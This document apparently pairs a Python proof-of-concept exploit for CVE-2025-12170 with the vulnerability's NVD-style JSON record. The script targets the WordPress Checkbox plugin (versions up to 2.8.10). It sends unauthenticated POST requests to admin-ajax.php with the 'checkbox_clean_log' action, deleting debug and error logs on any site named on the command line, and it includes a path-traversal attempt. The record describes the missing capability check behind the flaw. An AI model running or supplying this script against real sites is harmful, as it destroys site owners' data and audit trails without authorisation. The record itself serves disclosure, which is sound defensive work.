CVE-2025-12170

# CVE-2025-12170 PoC - WordPress Checkbox Plugin Unauthorized Log Deletion # Affected: Checkbox plugin for WordPress <= 2.8.10 import requests import sys def exploit_checkbox_log_deletion(target_url, log_file=None): """ Exploit for CVE-2025-12170 Unauthenticated attackers can clear log files via AJAX endpoint """ # Target AJAX endpoint ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Default log files to target log_files = [ 'debug.log', 'error_log', 'checkbox.log', '../../../error_log' # Path traversal attempt ] if log_file: log_files = [log_file] print(f"[*] Target: {target_url}") print(f"[*] AJAX Endpoint: {ajax_url}") print("[*] Starting exploitation...\n") for log in log_files: print(f"[*] Attempting to clear: {log}") # Construct AJAX request data = { 'action': 'checkbox_clean_log', 'log_file': log } try: # Send POST request without authentication response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully for {log}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] Exploitation complete") print("[*] Note: Log files may have been cleared without authorization") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-12170.py <target_url> [log_file]") print("Example: python cve-2025-12170.py http://example.com") sys.exit(1) target = sys.argv[1] log = sys.argv[2] if len(sys.argv) > 2 else None exploit_checkbox_log_deletion(target, log)

{"cve": {"id": "CVE-2025-12170", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:53.223", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Checkbox plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_ajax_nopriv_checkbox_clean_log' AJAX endpoint in all versions up to, and including, 2.8.10. This makes it possible for unauthenticated attackers to clear log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392710%40checkbox&new=3392710%40checkbox&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16735e63-d652-4b0e-b454-2bd13368d8a7?source=cve", "source": "[email protected]"}]}}